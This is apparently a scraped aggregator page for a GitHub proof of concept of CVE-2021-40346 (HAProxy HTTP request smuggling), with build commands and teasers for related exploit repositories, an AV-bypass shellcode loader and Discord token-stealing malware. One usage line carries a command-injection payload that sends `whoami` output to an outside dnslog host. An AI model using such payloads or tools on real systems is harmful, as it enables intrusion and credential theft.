CVE-2021-40346-POC
CVE-2021-40346 integer overflow enables http smuggling
整数溢出导致的http请求走私
Build
git clone https://github.com/donky16/CVE-2021-40346-POC.git
cd CVE-2021-40346-POC
docker-compose build
docker-compose up -d
Exploit
CVE-2021-40346 integer overflow enables http smuggling
Overview
Safety checks your installed dependencies for known security vulnerabilities
Safety checks your installed dependencies for known security vulnerabilities. By default it uses the open Python vulnerability database Safety DB, but
1.4k Dec 30, 2022
A simple password generator using Python Tkinter.
Password-Generator-using-Python A simple password generator that generates password for you. User can Copy the password to Clipboard. Project made usi
1 Nov 02, 2022
Python APK Reverser & Patcher Tool
DTL-X An Advanced Python APK Reverser and Patcher Tool. --rmads1: target=AndroidManifest.xml,replace=com.google.android.gms.ad --rmads2: No Internet (
10 Oct 31, 2022
SSLyze is a fast and powerful SSL/TLS scanning tool and Python library.
SSLyze SSLyze is a fast and powerful SSL/TLS scanning tool and Python library. SSLyze can analyze the SSL/TLS configuration of a server by connecting
2.8k Jan 03, 2023
python写的一款免杀工具(shellcode加载器)BypassAV,国内杀软全过(windows denfend)
python写的一款免杀工具(shellcode加载器)BypassAV,国内杀软全过(windows denfend)
266 Jan 02, 2023
A black hole for Internet advertisements
Network-wide ad blocking via your own Linux hardware The Pi-hole® is a DNS sinkhole that protects your devices from unwanted content, without installi
40.3k Jan 09, 2023
CVE-2021-22205 Unauthorized RCE
CVE-2021-22205 影响版本: Gitlab CE/EE 13.10.3 Gitlab CE/EE 13.9.6 Gitlab CE/EE 13.8.8 Usage python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog
70 Nov 09, 2022
Exploit for GitLab CVE-2021-22205 Unauthenticated Remote Code Execution
Vuln Impact An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files tha
2 Dec 30, 2021
Argument Injection in Dragonfly Ruby Gem
CVE-2021-33564 PoC Exploit script for CVE-2021-33564 (Argument Injection in Dragonfly Ruby Gem). Usage Arbitrary File Read python3 poc.py -u https://
12 Nov 09, 2022
Use scrapli to retrieve security zone information from a Juniper SRX firewall
Get Security Zones with Scrapli Overview This example will show how to retrieve security zone information on Juniper's SRX firewalls. In addition to t
2 Jun 19, 2022
GitHub Advance Security Compliance Action
advanced-security-compliance This Action was designed to allow users to configure their Risk threshold for security issues reported by GitHub Code Sca
121 Dec 14, 2022
Sudo Baron Samedit Exploit
CVE-2021-3156 (Sudo Baron Samedit) This repository is CVE-2021-3156 exploit targeting Linux x64. For writeup, please visit https://datafarm-cybersecur
559 Jan 03, 2023
MTBLLS Ethical Hacking Tool Announcement of v2.0
MTBLLS Ethical Hacking Tool Announcement of v2.0 MTBLLS is a Free and Open-Source Ethical Hacking Tool developed by GhostTD (SkyWtkh) The tool can onl
2 Mar 19, 2022
Automatic ProxyShell Exploit
proxyshell-auto usage: proxyshell.py [-h] -t T Automatic Exploit ProxyShell optional arguments: -h, --help show this help message and exit -t T
93 Jan 05, 2023
A fast sub domain brute tool for pentesters
subDomainsBrute 1.4 A fast sub domain brute tool for pentesters. It works with P
2 Oct 18, 2022
This is a repository filled with scripts that were made with Python, and designed to exploit computer systems.
PYTHON-EXPLOITATION This is a repository filled with scripts that were made with Python, and designed to exploit computer systems. Networking tcp_clin
1 Oct 30, 2021
Analyse a forensic target (such as a directory) to find and report files found and not found from CIRCL hashlookup public service
Analyse a forensic target (such as a directory) to find and report files found and not found from CIRCL hashlookup public service. This tool can help a digital forensic investigator to know the conte
96 Dec 20, 2022
A Proof-of-Concept Layer 2 Denial of Service Attack that disrupts low level operations of Programmable Logic Controllers within industrial environments. Utilizing multithreaded processing, Automator-Terminator delivers a powerful wave of spoofed ethernet packets to a null MAC address.
Automator-Terminator A Proof-of-Concept Layer 2 Denial of Service Attack that disrupts low level operations of Programmable Logic Controllers (PLCs) w
25 Oct 10, 2022
Malware for Discord, designed to steal passwords, tokens, and inject discord folders for long-term use.
Vital What is Vital? Vital is malware primarily used to collect and extract information from the Discord desktop client. While it has other features (
59 Dec 01, 2022
A brute force tool for password-protected zip file
Bzip A brute force tool for password-protected zip file/folder(s). Note that this tool can only crack .zip files. Please DO not misuse. Installation g
3 Nov 13, 2021